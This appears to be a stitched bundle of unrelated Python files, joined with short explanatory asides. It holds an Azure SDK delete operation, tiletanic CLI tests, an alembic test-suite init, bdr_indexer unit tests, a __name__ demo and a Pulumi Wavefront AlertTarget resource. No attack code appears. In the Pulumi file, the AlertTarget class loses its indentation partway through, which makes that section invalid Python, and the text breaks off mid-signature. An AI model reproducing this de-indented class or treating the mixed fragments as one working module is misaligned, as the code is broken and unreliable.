        Delete navigation property tokenLifetimePolicies for policies.

        :param token_lifetime_policy_id: key: id of tokenLifetimePolicy.
        :type token_lifetime_policy_id: str
        :param if_match: ETag.
        :type if_match: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.delete_token_lifetime_policies.metadata['url']  # type: ignore
        path_format_arguments = {
            'tokenLifetimePolicy-id': self._serialize.url("token_lifetime_policy_id", token_lifetime_policy_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        if if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.odataerror, response)
            raise HttpResponseError(response=response, model=error)

        if cls:
            return cls(pipeline_response, None, {})

    delete_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies/{tokenLifetimePolicy-id}'}  # type: ignore
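The `error_map.update(kwargs.pop('error_map', {}))` pattern in the operations above lets a caller override the default status-code-to-exception mapping on a per-call basis. A minimal stand-alone sketch of that merge (the exception classes here are illustrative stand-ins for the `azure.core.exceptions` types, not the real ones):

```python
class ClientAuthenticationError(Exception):
    """Stand-in for azure.core.exceptions.ClientAuthenticationError."""

class ResourceNotFoundError(Exception):
    """Stand-in for azure.core.exceptions.ResourceNotFoundError."""

def build_error_map(**kwargs):
    # Defaults mirror the generated operations above.
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError}
    # Caller-supplied overrides win, exactly like kwargs.pop('error_map', {}).
    error_map.update(kwargs.pop('error_map', {}))
    return error_map

# A caller can remap 404 to a custom exception while keeping the other defaults.
custom = build_error_map(error_map={404: KeyError})
```

Because `dict.update` overwrites existing keys, the caller's mapping always takes precedence over the generated defaults.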
# tests/test_cli_tilecover.py (repo: hasan-nn/tiletanic, license: MIT)

from click.testing import CliRunner

from tiletanic import cli


def test_cover_geometry_dgtiling_level_9_feature_collection():
    # Wall South Dakota AOI from geojson.io:
    # http://bl.ocks.org/d/fbc0b6427b48274c1782
    # http://bl.ocks.org/anonymous/raw/fbc0b6427b48274c1782/map.geojson
    wall_south_dakota_aoi = '{"type":"FeatureCollection","features":[{"geometry":{"type":"Polygon","coordinates":[[[-101.953125,43.59375],[-101.953125,44.296875],[-102.65625,44.296875],[-102.65625,43.59375],[-101.953125,43.59375]]]},"type":"Feature","properties":{}}]}'

    runner = CliRunner()
    result = runner.invoke(cli.cover_geometry, ['-'], input=wall_south_dakota_aoi)
    assert result.exit_code == 0
    assert result.output == "021323330\n"


def test_cover_geometry_dgtiling_level_9_feature():
    # Wall South Dakota AOI from geojson.io:
    # http://bl.ocks.org/d/fbc0b6427b48274c1782
    # http://bl.ocks.org/anonymous/raw/fbc0b6427b48274c1782/map.geojson
    wall_south_dakota_aoi = '{"geometry":{"coordinates":[[[ -101.953125,43.59375],[-101.953125,44.296875],[-102.65625,44.296875],[-102.65625,43.59375],[-101.953125,43.59375]]],"type":"Polygon"},"type":"Feature"}'

    runner = CliRunner()
    result = runner.invoke(cli.cover_geometry, ['-'], input=wall_south_dakota_aoi)
    assert result.exit_code == 0
    assert result.output == "021323330\n"


def test_cover_geometry_dgtiling_level_9_adajcent_tiles():
    # Wall South Dakota AOI from geojson.io:
    # http://bl.ocks.org/d/fbc0b6427b48274c1782
    # http://bl.ocks.org/anonymous/raw/fbc0b6427b48274c1782/map.geojson
    wall_south_dakota_aoi = '{"geometry":{"coordinates":[[[ -101.953125,43.59375],[-101.953125,44.296875],[-102.65625,44.296875],[-102.65625,43.59375],[-101.953125,43.59375]]],"type":"Polygon"},"type":"Feature"}'

    runner = CliRunner()
    result = runner.invoke(cli.cover_geometry, ['--adjacent', '-'], input=wall_south_dakota_aoi)
    assert result.exit_code == 0
    assert result.output == "021323303\n021323312\n021323313\n021323321\n021323323\n021323330\n021323331\n021323332\n021323333\n"
# virtual/lib/python3.8/site-packages/alembic/testing/suite/__init__.py (repo: Lenus254/personal_blog, license: Unlicense)

from .test_autogen_comments import * # noqa
from .test_autogen_computed import * # noqa
from .test_autogen_diffs import * # noqa
from .test_autogen_fks import * # noqa
from .test_autogen_identity import * # noqa
from .test_environment import * # noqa
from .test_op import * # noqa
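The star imports above make every public name from the suite's test modules importable from this one package. As a self-contained illustration of the mechanics (using a synthetic in-memory module, since the alembic modules themselves aren't needed to show the behaviour): a star import pulls in the names listed in `__all__` when it is defined, and otherwise every name that doesn't start with an underscore.

```python
import sys
import types

# Build a throwaway module in memory; star-import behaviour is the same
# as for a real module on disk.
fake = types.ModuleType("fake_suite")
exec("__all__ = ['exported']\nexported = 1\n_private = 2", fake.__dict__)
sys.modules["fake_suite"] = fake

# Star-import from it into a fresh namespace, as this __init__.py does
# from its sibling test modules.
ns = {}
exec("from fake_suite import *", ns)
```

Only `exported` lands in `ns`; `_private` stays behind because it is not listed in `__all__`.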
# tests/unit/test_irindexer.py (repo: Brown-University-Library/bdr_indexer, license: MIT)

import json
import os
import tempfile
import unittest
from unittest.mock import patch

from diskcache import Cache
import responses

from bdrxml import irMetadata

from bdr_solrizer.indexers import IRIndexer


class TestIRIndexer(unittest.TestCase):

    @responses.activate
    def test_1(self):
        responses.add(responses.GET, 'http://localhost/123/',
            body=json.dumps({'ancestors': [], 'name': 'Test Collection'}),
            status=200,
            content_type='application/json')
        ir_obj = irMetadata.make_ir()
        ir_obj.collection = 123
        with tempfile.TemporaryDirectory() as tmp_dir:
            data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
            self.assertEqual(data, {
                'depositor': None,
                'depositor_eppn': None,
                'depositor_email': None,
                'deposit_date': None,
                'collection_date': None,
                'ir_collection_id': ['123'],
                'ir_collection_name': ['Test Collection'],
            })

    def test_cached_value(self):
        ir_obj = irMetadata.make_ir()
        ir_obj.collection = 123
        ancestors = ['Grandparent', 'Parent', 'Test']
        with tempfile.TemporaryDirectory() as tmp_dir:
            with Cache(tmp_dir) as cache:
                cache.set('123_ancestors', ancestors)
            data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
            self.assertEqual(data, {
                'depositor': None,
                'depositor_eppn': None,
                'depositor_email': None,
                'deposit_date': None,
                'collection_date': None,
                'ir_collection_id': ['123'],
                'ir_collection_name': ancestors,
            })

    @responses.activate
    @patch('bdr_solrizer.indexers.IRIndexer._get_ancestors_from_cache')
    def test_cache_error(self, mock):
        responses.add(responses.GET, 'http://localhost/123/',
            body=json.dumps({'ancestors': ['API parent'], 'name': 'Test Collection'}),
            status=200,
            content_type='application/json')
        mock.side_effect = Exception('fake exception')
        ir_obj = irMetadata.make_ir()
        ir_obj.collection = 123
        ancestors = ['Grandparent', 'Parent', 'Test']
        with tempfile.TemporaryDirectory() as tmp_dir:
            with Cache(tmp_dir) as cache:
                cache.set('123_ancestors', ancestors)
            data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
            self.assertEqual(data, {
                'depositor': None,
                'depositor_eppn': None,
                'depositor_email': None,
                'deposit_date': None,
                'collection_date': None,
                'ir_collection_id': ['123'],
                'ir_collection_name': ['API parent', 'Test Collection'],
            })

    @responses.activate
    @patch('bdr_solrizer.indexers.IRIndexer._add_ancestors_to_cache')
    def test_cache_set_error(self, mock):
        responses.add(responses.GET, 'http://localhost/123/',
            body=json.dumps({'ancestors': ['API parent'], 'name': 'Test Collection'}),
            status=200,
            content_type='application/json')
        mock.side_effect = Exception('fake exception')
        ir_obj = irMetadata.make_ir()
        ir_obj.collection = 123
        with tempfile.TemporaryDirectory() as tmp_dir:
            data = IRIndexer(ir_obj.serialize(), collection_url='http://localhost/', cache_dir=tmp_dir).index_data()
            self.assertEqual(data, {
                'depositor': None,
                'depositor_eppn': None,
                'depositor_email': None,
                'deposit_date': None,
                'collection_date': None,
                'ir_collection_id': ['123'],
                'ir_collection_name': ['API parent', 'Test Collection'],
            })


if __name__ == '__main__':
    unittest.main()
# __name__ == '__main__'/important.py (repo: kyaiooiayk/Python-Programming, license: OLDAP-2.3)

def do_important():
    """This function does something very important"""
    print("I'm doing some important stuff here!")


do_important()
print("Called from important.py, __name__ has value?:", __name__)
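important.py prints its `__name__` so you can watch it change with how the module is loaded: it is `'__main__'` when the file is executed directly and the module's own name when it is imported. The usual guard builds on exactly that fact. A runnable sketch of both cases, using a temporary file so the demo is self-contained (`important_guarded.py` is an illustrative name, not part of the original repo):

```python
import contextlib
import io
import pathlib
import runpy
import tempfile

source = (
    "def do_important():\n"
    "    print(\"I'm doing some important stuff here!\")\n"
    "\n"
    "if __name__ == '__main__':\n"
    "    do_important()\n"
)

with tempfile.TemporaryDirectory() as tmp:
    path = pathlib.Path(tmp) / "important_guarded.py"
    path.write_text(source)

    # Executed as a script: __name__ is '__main__', so the guard fires.
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        runpy.run_path(str(path), run_name="__main__")
    ran_as_script = buf.getvalue()

    # Executed under its module name (what an import sees): guard is skipped.
    buf = io.StringIO()
    with contextlib.redirect_stdout(buf):
        runpy.run_path(str(path), run_name="important_guarded")
    ran_as_import = buf.getvalue()
```

The first run prints the message; the second produces no output, which is why putting side effects behind the guard keeps a module safe to import.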
# sdk/python/pulumi_wavefront/alert_target.py (repo: pulumi/pulumi-wavefront, licenses: ECL-2.0, Apache-2.0)

# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['AlertTargetArgs', 'AlertTarget']
@pulumi.input_type
class AlertTargetArgs:
    def __init__(__self__, *,
                 description: pulumi.Input[str],
                 recipient: pulumi.Input[str],
                 template: pulumi.Input[str],
                 triggers: pulumi.Input[Sequence[pulumi.Input[str]]],
                 content_type: Optional[pulumi.Input[str]] = None,
                 custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 email_subject: Optional[pulumi.Input[str]] = None,
                 is_html_content: Optional[pulumi.Input[bool]] = None,
                 method: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 routes: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]] = None):
        """
        The set of arguments for constructing an AlertTarget resource.
        :param pulumi.Input[str] description: Description describing this alert target.
        :param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
               routing key. `WEBHOOK`: URL endpoint.
        :param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
               `ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
        :param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custom HTTP header key/value pairs that will be
               sent in the requests with a method of `WEBHOOK`.
        :param pulumi.Input[str] email_subject: The subject title of an email notification target.
        :param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
        :param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
        :param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront.
        :param pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]] routes: List of routing targets that this alert target will notify. See Route.
        """
        pulumi.set(__self__, "description", description)
        pulumi.set(__self__, "recipient", recipient)
        pulumi.set(__self__, "template", template)
        pulumi.set(__self__, "triggers", triggers)
        if content_type is not None:
            pulumi.set(__self__, "content_type", content_type)
        if custom_headers is not None:
            pulumi.set(__self__, "custom_headers", custom_headers)
        if email_subject is not None:
            pulumi.set(__self__, "email_subject", email_subject)
        if is_html_content is not None:
            pulumi.set(__self__, "is_html_content", is_html_content)
        if method is not None:
            pulumi.set(__self__, "method", method)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if routes is not None:
            pulumi.set(__self__, "routes", routes)

    @property
    @pulumi.getter
    def description(self) -> pulumi.Input[str]:
        """
        Description describing this alert target.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: pulumi.Input[str]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def recipient(self) -> pulumi.Input[str]:
        """
        The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
        routing key. `WEBHOOK`: URL endpoint.
        """
        return pulumi.get(self, "recipient")

    @recipient.setter
    def recipient(self, value: pulumi.Input[str]):
        pulumi.set(self, "recipient", value)

    @property
    @pulumi.getter
    def template(self) -> pulumi.Input[str]:
        """
        A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
        """
        return pulumi.get(self, "template")

    @template.setter
    def template(self, value: pulumi.Input[str]):
        pulumi.set(self, "template", value)

    @property
    @pulumi.getter
    def triggers(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
        `ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
        """
        return pulumi.get(self, "triggers")

    @triggers.setter
    def triggers(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "triggers", value)

    @property
    @pulumi.getter(name="contentType")
    def content_type(self) -> Optional[pulumi.Input[str]]:
        """
        The value of the `Content-Type` header of the webhook.
        """
        return pulumi.get(self, "content_type")

    @content_type.setter
    def content_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "content_type", value)

    @property
    @pulumi.getter(name="customHeaders")
    def custom_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A `string->string` map specifying the custom HTTP header key/value pairs that will be
        sent in the requests with a method of `WEBHOOK`.
        """
        return pulumi.get(self, "custom_headers")

    @custom_headers.setter
    def custom_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "custom_headers", value)

    @property
    @pulumi.getter(name="emailSubject")
    def email_subject(self) -> Optional[pulumi.Input[str]]:
        """
        The subject title of an email notification target.
        """
        return pulumi.get(self, "email_subject")

    @email_subject.setter
    def email_subject(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "email_subject", value)

    @property
    @pulumi.getter(name="isHtmlContent")
    def is_html_content(self) -> Optional[pulumi.Input[bool]]:
        """
        Determine whether the email alert content is sent as HTML or text.
        """
        return pulumi.get(self, "is_html_content")

    @is_html_content.setter
    def is_html_content(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_html_content", value)

    @property
    @pulumi.getter
    def method(self) -> Optional[pulumi.Input[str]]:
        """
        The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
        """
        return pulumi.get(self, "method")

    @method.setter
    def method(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "method", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the alert target as it is displayed in wavefront.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def routes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]:
        """
        List of routing targets that this alert target will notify. See Route.
        """
        return pulumi.get(self, "routes")

    @routes.setter
    def routes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]):
        pulumi.set(self, "routes", value)

@pulumi.input_type
class _AlertTargetState:
    def __init__(__self__, *,
                 content_type: Optional[pulumi.Input[str]] = None,
                 custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 email_subject: Optional[pulumi.Input[str]] = None,
                 is_html_content: Optional[pulumi.Input[bool]] = None,
                 method: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 recipient: Optional[pulumi.Input[str]] = None,
                 routes: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]] = None,
                 target_id: Optional[pulumi.Input[str]] = None,
                 template: Optional[pulumi.Input[str]] = None,
                 triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
        """
        Input properties used for looking up and filtering AlertTarget resources.
        :param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custom HTTP header key/value pairs that will be
               sent in the requests with a method of `WEBHOOK`.
        :param pulumi.Input[str] description: Description describing this alert target.
        :param pulumi.Input[str] email_subject: The subject title of an email notification target.
        :param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
        :param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
        :param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront.
        :param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
               routing key. `WEBHOOK`: URL endpoint.
        :param pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]] routes: List of routing targets that this alert target will notify. See Route.
        :param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
               `ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
        """
        if content_type is not None:
            pulumi.set(__self__, "content_type", content_type)
        if custom_headers is not None:
            pulumi.set(__self__, "custom_headers", custom_headers)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if email_subject is not None:
            pulumi.set(__self__, "email_subject", email_subject)
        if is_html_content is not None:
            pulumi.set(__self__, "is_html_content", is_html_content)
        if method is not None:
            pulumi.set(__self__, "method", method)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if recipient is not None:
            pulumi.set(__self__, "recipient", recipient)
        if routes is not None:
            pulumi.set(__self__, "routes", routes)
        if target_id is not None:
            pulumi.set(__self__, "target_id", target_id)
        if template is not None:
            pulumi.set(__self__, "template", template)
        if triggers is not None:
            pulumi.set(__self__, "triggers", triggers)

    @property
    @pulumi.getter(name="contentType")
    def content_type(self) -> Optional[pulumi.Input[str]]:
        """
        The value of the `Content-Type` header of the webhook.
        """
        return pulumi.get(self, "content_type")

    @content_type.setter
    def content_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "content_type", value)

    @property
    @pulumi.getter(name="customHeaders")
    def custom_headers(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A `string->string` map specifying the custom HTTP header key/value pairs that will be
        sent in the requests with a method of `WEBHOOK`.
        """
        return pulumi.get(self, "custom_headers")

    @custom_headers.setter
    def custom_headers(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "custom_headers", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        Description describing this alert target.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="emailSubject")
    def email_subject(self) -> Optional[pulumi.Input[str]]:
        """
        The subject title of an email notification target.
        """
        return pulumi.get(self, "email_subject")

    @email_subject.setter
    def email_subject(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "email_subject", value)

    @property
    @pulumi.getter(name="isHtmlContent")
    def is_html_content(self) -> Optional[pulumi.Input[bool]]:
        """
        Determine whether the email alert content is sent as HTML or text.
        """
        return pulumi.get(self, "is_html_content")

    @is_html_content.setter
    def is_html_content(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_html_content", value)

    @property
    @pulumi.getter
    def method(self) -> Optional[pulumi.Input[str]]:
        """
        The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
        """
        return pulumi.get(self, "method")

    @method.setter
    def method(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "method", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the alert target as it is displayed in wavefront.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def recipient(self) -> Optional[pulumi.Input[str]]:
        """
        The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
        routing key. `WEBHOOK`: URL endpoint.
        """
        return pulumi.get(self, "recipient")

    @recipient.setter
    def recipient(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "recipient", value)

    @property
    @pulumi.getter
    def routes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]:
        """
        List of routing targets that this alert target will notify. See Route.
        """
        return pulumi.get(self, "routes")

    @routes.setter
    def routes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AlertTargetRouteArgs']]]]):
        pulumi.set(self, "routes", value)

    @property
    @pulumi.getter(name="targetId")
    def target_id(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "target_id")

    @target_id.setter
    def target_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_id", value)

    @property
    @pulumi.getter
    def template(self) -> Optional[pulumi.Input[str]]:
        """
        A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
        """
        return pulumi.get(self, "template")

    @template.setter
    def template(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "template", value)

    @property
    @pulumi.getter
    def triggers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
        `ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
        """
        return pulumi.get(self, "triggers")

    @triggers.setter
    def triggers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "triggers", value)

class AlertTarget(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
content_type: Optional[pulumi.Input[str]] = None,
custom_headers: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
email_subject: Optional[pulumi.Input[str]] = None,
is_html_content: Optional[pulumi.Input[bool]] = None,
method: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
recipient: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]]] = None,
template: Optional[pulumi.Input[str]] = None,
triggers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Provides a wavefront Alert Target resource. This allows alert targets to created, updated, and deleted.
## Example Usage
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Attributes Reference
* `target_id` - The target ID prefixed with `target:` for interpolating into a Wavefront Alert.
### Route
The `route` mapping supports the following:
* `method` - (Required) The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
* `target` - (Required) The endpoint for the alert route. `EMAIL`: email address. `PAGERDUTY`: PagerDuty routing
key. `WEBHOOK`: URL endpoint.
* `filter` - (Required) String that filters the route. Space delimited. Currently only allows a single key value pair.
(e.g. `env prod`)
### Example
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
routes=[
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "prod",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/prod",
),
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "dev",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/dev",
),
],
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Import
Alert Targets can be imported using the `id`, e.g.
```sh
$ pulumi import wavefront:index/alertTarget:AlertTarget alert_target abcdEFGhijKLMNO
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] content_type: The value of the `Content-Type` header of the webhook.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] custom_headers: A `string->string` map specifying the custome HTTP header key/value pairs that will be
sent in the requests with a method of `WEBHOOK`.
:param pulumi.Input[str] description: Description describing this alert target.
:param pulumi.Input[str] email_subject: The subject title of an email notification target.
:param pulumi.Input[bool] is_html_content: Determine whether the email alert content is sent as HTML or text.
:param pulumi.Input[str] method: The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
:param pulumi.Input[str] name: The name of the alert target as it is displayed in wavefront
:param pulumi.Input[str] recipient: The end point for the notification Target. `EMAIL`: email address. `PAGERDUTY`: PagerDuty
routing key. `WEBHOOK`: URL endpoint.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertTargetRouteArgs']]]] routes: List of routing targets that this alert target will notify. See Route
:param pulumi.Input[str] template: A mustache template that will form the body of the POST request, email and summary of the PagerDuty.
:param pulumi.Input[Sequence[pulumi.Input[str]]] triggers: A list of occurrences on which this webhook will be fired. Valid values are `ALERT_OPENED`,
`ALERT_UPDATED`, `ALERT_RESOLVED`, `ALERT_MAINTENANCE`, `ALERT_SNOOZED`, `ALERT_NO_DATA`, `ALERT_NO_DATA_RESOLVED`, `ALERT_NO_DATA_MAINTENANCE`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AlertTargetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Wavefront Alert Target resource. This allows alert targets to be created, updated, and deleted.
## Example Usage
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Attributes Reference
* `target_id` - The target ID prefixed with `target:` for interpolating into a Wavefront Alert.
### Route
The `route` mapping supports the following:
* `method` - (Required) The notification method used for notification target. One of `WEBHOOK`, `EMAIL`, `PAGERDUTY`.
* `target` - (Required) The endpoint for the alert route. `EMAIL`: email address. `PAGERDUTY`: PagerDuty routing
key. `WEBHOOK`: URL endpoint.
* `filter` - (Required) String that filters the route. Space delimited. Currently only allows a single key value pair.
(e.g. `env prod`)
### Example
```python
import pulumi
import pulumi_wavefront as wavefront
test_target = wavefront.AlertTarget("testTarget",
content_type="application/json",
custom_headers={
"Testing": "true",
},
description="Test target",
method="WEBHOOK",
recipient="https://hooks.slack.com/services/test/me",
routes=[
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "prod",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/prod",
),
wavefront.AlertTargetRouteArgs(
filter={
"key": "env",
"value": "dev",
},
method="WEBHOOK",
target="https://hooks.slack.com/services/test/me/dev",
),
],
template="{}",
triggers=[
"ALERT_OPENED",
"ALERT_RESOLVED",
])
```
## Import
Alert Targets can be imported using the `id`, e.g.
```sh
$ pulumi import wavefront:index/alertTarget:AlertTarget alert_target abcdEFGhijKLMNO
```
:param str resource_name: The name of the resource.
:param AlertTargetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AlertTargetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
